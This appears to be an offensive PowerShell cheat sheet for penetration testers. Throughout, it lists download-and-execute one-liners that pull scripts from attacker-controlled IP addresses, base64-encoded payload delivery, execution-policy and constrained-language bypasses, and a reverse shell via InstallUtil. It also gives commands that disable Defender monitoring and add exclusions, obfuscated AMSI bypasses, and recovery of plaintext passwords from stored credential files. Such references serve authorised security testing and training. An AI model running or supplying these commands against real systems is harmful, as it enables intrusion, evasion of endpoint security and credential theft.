Basic PowerShell for Pentesters

Default PowerShell locations

C:\windows\syswow64\windowspowershell\v1.0\powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell

Basic PS commands to start

Get-Help * Get-Help process Get-Help Get-Item -Full Get-Help Get-Item -Examples Import-Module <modulepath>Get-Command -Module <modulename>

Download & Execute

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"iex (iwr '10.10.14.9:8000/ipw.ps1') ​$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(

Using b64 from linux

echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

Download

System.Net.WebClient

(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")

Invoke-WebRequest

Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"

Wget

wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

BitsTransfer

Import-Module BitsTransferStart-BitsTransfer -Source $url -Destination $output# ORStart-BitsTransfer -Source $url -Destination $output -Asynchronous

Base64 Kali & EncodedCommand

kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0PS> powershell -EncodedCommand <Base64>

Execution Policy

By default it is set to restricted. Main ways to bypass this policy:

1º Just copy and paste inside the interactive PS console2º Read en ExecGet-Content .runme.ps1 | PowerShell.exe -noprofile -3º Read and ExecGet-Content .runme.ps1 | Invoke-Expression4º Use other execution policyPowerShell.exe -ExecutionPolicy Bypass -File .runme.ps15º Change users execution policySet-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted6º Change execution policy for this sessionSet-ExecutionPolicy Bypass -Scope Process7º Download and execute:powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"8º Use command switchPowershell -command "Write-Host 'My voice is my passport, verify me.'"9º Use EncodeCommand$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

More can be found here​

Constrained language

$ExecutionContext.SessionState.LanguageMode

Bypass

In current Windows that Bypass won't work but you can use PSByPassCLM. To compile it you may need to Add a Reference -> Browse ->Browse -> add C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\_31bf3856ad364e35\System.Management.Automation.dll_ and change the project to .Net4.5.

Direct bypass:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe

Reverse shell:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe

AppLockerPolicy

Check which files/extensions are blacklisted/whitelisted.

Get-ApplockerPolicy -Effective -xmlGet-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections$a = Get-ApplockerPolicy -effective$a.rulecollections

Enable WinRM (Remote PS)

enable-psremoting -force ​​Get-NetConnectionProfile |  Where{ $_.NetWorkCategory -ne 'Private'} |  ForEach {    $_    $_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm  }

Antivirus

Get-MpComputerStatusSet-MpPreference -DisableRealtimeMonitoring $trueAdd-MpPreference -ExclusionPath "C:\users\public\documents\magichk""[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"

PS-History

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

OS version and HotFixes

[System.Environment]::OSVersion.Version Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} Get-Hotfix -description "Security update" 

Environment

Get-ChildItem Env: | ft Key,Value $env:UserName @Get UserName value

Other connected drives

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

Recycle Bin

$shell = New-Object -com shell.application$rb = $shell.Namespace(10)$rb.Items()

​https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/​

Domain Recon

Users

Get-LocalUser | ft Name,Enabled,Description,LastLogonGet-ChildItem C:\Users -Force | select Name

Secure String to Plaintext

$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring$user = "HTB\Tom"$cred = New-Object System.management.Automation.PSCredential($user, $pass)$cred.GetNetworkCredential() | fl​UserName       : TomPassword       : 1ts-mag1c!!!SecurePassword : System.Security.SecureStringDomain         : HTB

Or directly parsing form XML:

$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *​UserName       : TomPassword       : 1ts-mag1c!!!SecurePassword : System.Security.SecureStringDomain         : HTB

SUDO

$pass = ConvertTo-SecureString '' -AsPlainText -Force$cred = New-Object System.Management.Automation.PSCredential("", $pass)​Start-Process -Credential ($cred)  -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"​Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $credInvoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred​Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'​$secpasswd = ConvertTo-SecureString "" -AsPlainText -Force$mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd)$computer = ""

Groups

Get-LocalGroup | ft Name Get-LocalGroupMember Administrators | ft Name, PrincipalSource 

Clipboard

Processes

Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Services

Password from secure string

$pw=gc admin-pass.xml | convertto-securestring $cred=new-object system.management.automation.pscredential("administrator", $pw)$cred.getnetworkcredential() | fl * 

Scheduled Tasks

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

Network

Interfaces

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4AddressGet-DnsClientServerAddress -AddressFamily IPv4 | ft

Route

ARP

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

Hosts

Get-Content C:\WINDOWS\System32\drivers\etc\hosts

Ping

$ping = New-Object System.Net.Networkinformation.Ping1..254 | % { $ping.send("10.9.15.$_") | select address, status }

SNMP

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

AMSI bypass

(old) [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)​(new)$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')$field.SetValue($null,$true)​​https://github.com/rasta-mouse/AmsiScanBufferBypass​https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell​https://blog.f-secure.com/hunting-for-amsi-bypasses/https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scanshttps://slaeryan.github.io/posts/falcon-zero-alpha.html